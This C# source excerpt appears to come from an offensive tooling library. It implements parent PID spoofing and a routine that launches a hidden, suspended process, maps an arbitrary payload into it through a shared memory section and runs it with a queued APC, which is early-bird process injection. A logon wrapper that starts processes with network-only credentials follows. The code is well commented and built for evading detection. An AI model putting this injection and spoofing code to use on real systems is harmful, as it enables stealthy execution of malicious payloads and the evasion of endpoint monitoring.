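        // Counterpart of Natives.InitializeProcThreadAttributeList; declared locally because the
        // visible Natives surface only exposes Initialize/Update, and the list must be deleted
        // before its buffer is freed.
        [DllImport("kernel32.dll")]
        private static extern void DeleteProcThreadAttributeList(IntPtr lpAttributeList);

        /// <summary>
        /// Creates <paramref name="processname"/> with <paramref name="ppid"/> re-assigned as its parent
        /// through the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute (parent PID spoofing).
        /// </summary>
        /// <param name="processname">Passed to CreateProcess as lpCommandLine; lpApplicationName is null.</param>
        /// <param name="ppid">PID of the process that should appear as the parent. Its handle is taken from
        /// <see cref="Process.Handle"/>, so the caller needs enough rights to open it.</param>
        /// <param name="cf">Creation flags. EXTENDED_STARTUPINFO_PRESENT is OR-ed in unconditionally because
        /// without it the attribute list in STARTUPINFOEX is ignored and no spoofing happens.</param>
        /// <param name="procInfo">Receives the PROCESS_INFORMATION of the new process on success. The caller owns
        /// hProcess and hThread.</param>
        /// <returns>true when CreateProcess succeeded; false when the parent PID does not exist or cannot be
        /// opened, the attribute list could not be sized, or CreateProcess failed.</returns>
        /// <remarks>
        /// All unmanaged buffers (both SECURITY_ATTRIBUTES, the attribute list and the handle cell) are
        /// released before returning, on every path. The Process object for the parent is kept alive until
        /// CreateProcess has returned so its handle cannot be closed by a finalizer in the meantime.
        /// </remarks>
        public static bool CreateProcess(string processname, int ppid, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION procInfo)
        {
            Natives.STARTUPINFOEX sInfoEx = new Natives.STARTUPINFOEX();
            sInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(sInfoEx);

            Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES();
            Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES();
            pSec.nLength = Marshal.SizeOf(pSec);
            tSec.nLength = Marshal.SizeOf(tSec);

            // Resolve the parent first: an unknown PID is an ordinary failure for the caller, not an exception.
            Process parent;
            try
            {
                parent = Process.GetProcessById(ppid);
            }
            catch (ArgumentException)
            {
                return(false);
            }

            IntPtr pntpSec = IntPtr.Zero;
            IntPtr pnttSec = IntPtr.Zero;
            IntPtr lpValue = IntPtr.Zero;
            bool attributeListReady = false;

            // The Process object owns the handle we write into the attribute list; keep it alive
            // until CreateProcess has consumed it.
            using (parent)
            {
                IntPtr parentHandle;
                try
                {
                    parentHandle = parent.Handle;
                }
                catch (InvalidOperationException)
                {
                    return(false);
                }
                catch (System.ComponentModel.Win32Exception)
                {
                    // Typically access denied (protected or higher-integrity parent).
                    return(false);
                }

                try
                {
                    pntpSec = Marshal.AllocHGlobal(Marshal.SizeOf(pSec));
                    Marshal.StructureToPtr(pSec, pntpSec, false);
                    pnttSec = Marshal.AllocHGlobal(Marshal.SizeOf(tSec));
                    Marshal.StructureToPtr(tSec, pnttSec, false);

                    // First call only reports the size needed for one attribute; the second initializes the list.
                    IntPtr lpSize = IntPtr.Zero;
                    Natives.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
                    if (lpSize == IntPtr.Zero)
                    {
                        return(false);
                    }
                    sInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
                    Natives.InitializeProcThreadAttributeList(sInfoEx.lpAttributeList, 1, 0, ref lpSize);
                    attributeListReady = true;

                    lpValue = Marshal.AllocHGlobal(IntPtr.Size);
                    Marshal.WriteIntPtr(lpValue, parentHandle);
                    // NOTE(review): the return type of this P/Invoke is not visible here; once Natives declares
                    // it as bool, a false result should also return false.
                    Natives.UpdateProcThreadAttribute(sInfoEx.lpAttributeList, 0, (IntPtr)Natives.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);

                    // Without EXTENDED_STARTUPINFO_PRESENT CreateProcess reads sInfoEx as a plain STARTUPINFO
                    // and the parent attribute is silently dropped.
                    uint creationFlags = (uint)(cf | Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT);

                    return(Natives.CreateProcess(IntPtr.Zero, processname, pntpSec, pnttSec, false, creationFlags, IntPtr.Zero, IntPtr.Zero, ref sInfoEx, out procInfo));
                }
                finally
                {
                    // Release in reverse order of acquisition; delete the list before freeing its buffer.
                    if (lpValue != IntPtr.Zero)
                    {
                        Marshal.FreeHGlobal(lpValue);
                    }
                    if (attributeListReady)
                    {
                        DeleteProcThreadAttributeList(sInfoEx.lpAttributeList);
                    }
                    if (sInfoEx.lpAttributeList != IntPtr.Zero)
                    {
                        Marshal.FreeHGlobal(sInfoEx.lpAttributeList);
                    }
                    if (pnttSec != IntPtr.Zero)
                    {
                        Marshal.FreeHGlobal(pnttSec);
                    }
                    if (pntpSec != IntPtr.Zero)
                    {
                        Marshal.FreeHGlobal(pntpSec);
                    }
                }
            }
        }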
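        // Used to tear down the suspended child when injection fails part-way; the visible Natives
        // surface has no terminate primitive, and hProcess from CreateProcess is sufficient for it.
        [DllImport("kernel32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode);

        /// <summary>
        /// Spawns <paramref name="binary"/> suspended with <paramref name="ppid"/> as its spoofed parent, maps a
        /// section containing <paramref name="payload"/> into both this process (RW, for the copy) and the child
        /// (execute only), then queues the child's initial thread with an APC at the mapped address and resumes it.
        /// </summary>
        /// <param name="binary">Command line handed to <see cref="Spawner.CreateProcess"/>.</param>
        /// <param name="payload">Raw code to run in the child. Must be non-null and non-empty.</param>
        /// <param name="ppid">PID of the process to present as the child's parent.</param>
        /// <returns>true once the APC is queued and the child resumed; false on any earlier failure.</returns>
        /// <exception cref="ArgumentNullException"><paramref name="payload"/> is null.</exception>
        /// <remarks>
        /// On every failure after the child was created, the suspended child is terminated so it is not left
        /// hanging, and the local view, the section handle and both PROCESS_INFORMATION handles are released.
        /// On success the section handle and the local view are released too; the child's mapped view keeps
        /// the section alive. Name is kept (typo and all) because it is part of the public surface.
        /// </remarks>
        public static bool SapwnAndInjectPPID(string binary, byte[] payload, int ppid)
        {
            if (payload == null)
            {
                throw new ArgumentNullException("payload");
            }
            if (payload.Length == 0)
            {
                // Nothing to inject; do not spawn a process just to leave it suspended.
                return(false);
            }

            Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
            Natives.CreationFlags       flags    = Natives.CreationFlags.CREATE_SUSPENDED | Natives.CreationFlags.DETACHED_PROCESS
                                                   | Natives.CreationFlags.CREATE_NO_WINDOW | Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT;

            if (!Spawner.CreateProcess(binary, ppid, flags, ref procInfo))
            {
                return(false);
            }

            IntPtr section  = IntPtr.Zero;
            IntPtr baseAddr = IntPtr.Zero;
            bool   injected = false;

            try
            {
                // Round payload size up to page granularity for the section.
                uint size = InjectionHelper.GetSectionSize(payload.Length);

                section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE);
                if (section == IntPtr.Zero)
                {
                    return(false);
                }

                // Local RW view: only used to copy the payload in.
                IntPtr viewSize = (IntPtr)size;
                InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_READWRITE);
                if (baseAddr == IntPtr.Zero)
                {
                    return(false);
                }

                Marshal.Copy(payload, 0, baseAddr, payload.Length);

                // Remote execute-only view of the same section in the suspended child.
                IntPtr baseAddrEx = IntPtr.Zero;
                IntPtr viewSizeEx = (IntPtr)size;
                InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE);
                if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
                {
                    return(false);
                }

                // The local view served its purpose; drop it before handing control to the child.
                bool unmapped = InjectionHelper.UnMapViewOfSection(baseAddr);
                baseAddr = IntPtr.Zero;
                if (!unmapped)
                {
                    return(false);
                }

                // Queue the payload address as an APC on the child's (still suspended) initial thread.
                if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
                {
                    return(false);
                }

                InjectionHelper.ResumeThread(procInfo);
                injected = true;
                return(true);
            }
            finally
            {
                if (baseAddr != IntPtr.Zero)
                {
                    InjectionHelper.UnMapViewOfSection(baseAddr);
                }
                if (section != IntPtr.Zero)
                {
                    // Assumes CreateSection returns a kernel handle; the child's view keeps the object alive.
                    Natives.CloseHandle(section);
                }
                if (!injected)
                {
                    // Do not leave a suspended, half-injected child behind.
                    TerminateProcess(procInfo.hProcess, 1);
                }
                Natives.CloseHandle(procInfo.hThread);
                Natives.CloseHandle(procInfo.hProcess);
            }
        }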
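        /// <summary>
        /// Starts <paramref name="binary"/>, located in <paramref name="path"/>, through CreateProcessWithLogonW
        /// with LOGON_NETCREDENTIALS_ONLY and <paramref name="path"/> as the working directory.
        /// </summary>
        /// <param name="username">Account name used for outbound network authentication.</param>
        /// <param name="password">Password for that account, as a managed string (see remarks).</param>
        /// <param name="domain">Domain of that account.</param>
        /// <param name="path">Directory holding the executable; also used as lpCurrentDirectory. May be null or empty.</param>
        /// <param name="binary">Executable file name.</param>
        /// <param name="arguments">Appended verbatim after the quoted executable; the caller is responsible
        /// for quoting and must not pass untrusted text here.</param>
        /// <param name="cf">Creation flags.</param>
        /// <param name="processInformation">Receives the PROCESS_INFORMATION of the new process.</param>
        /// <returns>true when the process was created, false otherwise.</returns>
        /// <remarks>
        /// Per the Win32 documentation, with LOGON_NETCREDENTIALS_ONLY the process runs under the caller's
        /// local token and the supplied credentials are used only for network access; they are not validated
        /// when the process is created, so a wrong password still yields a running process.
        /// The password lives in a managed string and cannot be scrubbed from memory by this wrapper.
        /// Two fixes over the previous version: the path is joined with a separator (plain concatenation turned
        /// "C:\Tools" + "x.exe" into "C:\Toolsx.exe"), and argv[0] is quoted so a path containing spaces is not
        /// split by the child's command-line parsing.
        /// </remarks>
        public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation)
        {
            Natives.STARTUPINFO startupInfo = new Natives.STARTUPINFO();
            startupInfo.cb = (uint)Marshal.SizeOf(typeof(Natives.STARTUPINFO));

            string executable = string.IsNullOrEmpty(path) ? binary : System.IO.Path.Combine(path, binary);

            string commandLine = "\"" + executable + "\"";
            if (!string.IsNullOrEmpty(arguments))
            {
                commandLine += " " + arguments;
            }

            if (!Natives.CreateProcessWithLogonW(username, domain, password,
                                                 Natives.LogonFlags.NetCredentialsOnly, executable, commandLine, cf, 0, path, ref startupInfo, out processInformation))
            {
                return(false);
            }
            Console.WriteLine("Process created");
            return(true);
        }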
        /// <summary>
        /// Convenience overload: runs <paramref name="binary"/> from <paramref name="path"/> as the current user
        /// via the full <c>CreateProcessWithLogonW</c> overload, using a placeholder password.
        /// </summary>
        /// <param name="path">Directory holding the executable; also becomes the working directory.</param>
        /// <param name="binary">Executable file name.</param>
        /// <param name="arguments">Command-line arguments appended by the full overload.</param>
        /// <param name="cf">Creation flags.</param>
        /// <param name="processInformation">Receives the PROCESS_INFORMATION of the new process.</param>
        /// <returns>Whatever the full overload returns.</returns>
        /// <remarks>
        /// The literal "password" is deliberately not a real secret: the full overload uses
        /// LOGON_NETCREDENTIALS_ONLY, which per the Win32 documentation does not validate the credentials at
        /// creation time, so the child still starts under the caller's own token. Any network authentication
        /// from that child using these credentials is expected to fail.
        /// The domain falls back to the machine name when <see cref="Environment.UserDomainName"/> throws
        /// (the catch is intentionally broad; the exact exception type varies by platform).
        /// </remarks>
        public static bool CreateProcessWithLogonW(string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation)
        {
            string logonDomain = ResolveLogonDomain();
            string currentUser = Environment.UserName;

            return(CreateProcessWithLogonW(currentUser, "password", logonDomain, path, binary, arguments, cf, ref processInformation));
        }

        // Domain of the current user, or the local machine name when it cannot be determined.
        private static string ResolveLogonDomain()
        {
            try
            {
                return(Environment.UserDomainName);
            }
            catch (Exception)
            {
                return(System.Environment.MachineName);
            }
        }